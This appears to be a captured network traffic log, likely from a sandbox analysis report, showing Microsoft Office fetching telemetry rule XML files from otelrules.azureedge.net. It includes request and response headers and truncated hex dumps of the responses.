2024-11-11 00:15:13 UTC	1401	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA

Session ID	Source IP	Source Port	Destination IP	Destination Port
107	192.168.2.4	49866	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:13 UTC	192	OUT	GET /rules/rule700400v2s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:13 UTC	538	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:13 GMT Content-Type: text/xml Content-Length: 1366 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT ETag: "0x8DC582BDB779FC3" x-ms-request-id: fe4e74db-301e-003f-25bc-2c266f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001513Z-16547b76f7fxdzxghC1DFWmf7n0000000ddg00000000hagt x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:13 UTC	1366	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2

Session ID	Source IP	Source Port	Destination IP	Destination Port
108	192.168.2.4	49868	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:14 UTC	192	OUT	GET /rules/rule700350v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:14 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:14 GMT Content-Type: text/xml Content-Length: 1360 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT ETag: "0x8DC582BDD74D2EC" x-ms-request-id: 1551dffe-f01e-00aa-17c2-338521000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001514Z-15869dbbcc6rnr5chC1DFWwtp400000001z000000000pdzb x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:14 UTC	1360	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
109	192.168.2.4	49869	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:14 UTC	192	OUT	GET /rules/rule703901v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:14 UTC	515	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:14 GMT Content-Type: text/xml Content-Length: 1427 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT ETag: "0x8DC582BE56F6873" x-ms-request-id: 384ed142-801e-0047-1f8c-327265000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001514Z-16547b76f7f7scqbhC1DFW0m5w0000000dag000000000dqv x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:14 UTC	1427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu

Session ID	Source IP	Source Port	Destination IP	Destination Port
110	192.168.2.4	49871	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:14 UTC	192	OUT	GET /rules/rule703900v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:14 UTC	538	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:14 GMT Content-Type: text/xml Content-Length: 1390 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT ETag: "0x8DC582BE3002601" x-ms-request-id: 157887d5-b01e-0084-44d2-2cd736000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001514Z-16547b76f7fq9mcrhC1DFWq15w0000000d8000000000my40 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:14 UTC	1390	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=

Session ID	Source IP	Source Port	Destination IP	Destination Port
111	192.168.2.4	49867	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:14 UTC	192	OUT	GET /rules/rule700351v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:14 UTC	515	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:14 GMT Content-Type: text/xml Content-Length: 1397 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT ETag: "0x8DC582BDFD43C07" x-ms-request-id: 096f5268-e01e-0033-1f6c-324695000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001514Z-17df447cdb5l865xhC1DFW9n7g00000006f000000000nhvf x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-11 00:15:14 UTC	1397	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys

Session ID	Source IP	Source Port	Destination IP	Destination Port
112	192.168.2.4	49872	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:14 UTC	192	OUT	GET /rules/rule701501v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:14 UTC	538	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:14 GMT Content-Type: text/xml Content-Length: 1401 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT ETag: "0x8DC582BE2A9D541" x-ms-request-id: c6a80355-b01e-0070-0e08-2c1cc0000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001514Z-16547b76f7fnlcwwhC1DFWz6gw0000000dfg00000000amme x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:14 UTC	1401	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS

Session ID	Source IP	Source Port	Destination IP	Destination Port
113	192.168.2.4	49873	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:14 UTC	192	OUT	GET /rules/rule701500v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:15 UTC	517	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:15 GMT Content-Type: text/xml Content-Length: 1364 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT ETag: "0x8DC582BEB6AD293" x-ms-request-id: 3018dbe1-101e-008d-70d2-2c92e5000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001515Z-16547b76f7frbg6bhC1DFWr5400000000d6g00000000nrng x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:15 UTC	1364	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
114	192.168.2.4	49874	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:15 UTC	192	OUT	GET /rules/rule702801v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:15 UTC	538	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:15 GMT Content-Type: text/xml Content-Length: 1391 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT ETag: "0x8DC582BDF58DC7E" x-ms-request-id: 6c65b011-001e-000b-6024-2c15a7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001515Z-16547b76f7fq9mcrhC1DFWq15w0000000deg0000000001dq x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:15 UTC	1391	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S

Session ID	Source IP	Source Port	Destination IP	Destination Port
115	192.168.2.4	49875	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:15 UTC	192	OUT	GET /rules/rule702800v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:15 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:15 GMT Content-Type: text/xml Content-Length: 1354 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT ETag: "0x8DC582BE0662D7C" x-ms-request-id: d5116f2b-b01e-005c-0512-334c66000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001515Z-17df447cdb59mt7dhC1DFWqpg400000009sg000000001r69 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:15 UTC	1354	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O

Session ID	Source IP	Source Port	Destination IP	Destination Port
116	192.168.2.4	49877	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:15 UTC	192	OUT	GET /rules/rule703351v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:15 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:15 GMT Content-Type: text/xml Content-Length: 1403 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT ETag: "0x8DC582BDCDD6400" x-ms-request-id: 0e4947a7-101e-0028-4559-318f64000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001515Z-17df447cdb57g7m7hC1DFW791s00000009r0000000006p9c x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:15 UTC	1403	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken

Session ID	Source IP	Source Port	Destination IP	Destination Port
117	192.168.2.4	49878	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:15:15 UTC	192	OUT	GET /rules/rule703350v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:15:15 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:15:15 GMT Content-Type: text/xml Content-Length: 1366 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT ETag: "0x8DC582BDF1E2608" x-ms-request-id: e1c70f00-601e-0050-3545-322c9c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001515Z-17df447cdb56j5xmhC1DFWn91800000009qg00000000gwph x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:15:15 UTC	1366	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 63 72 69 70 74 4c 61 62 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2

Session ID	Source IP	Source Port	Destination IP	Destination Port
118	192.168.2.4	49879	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
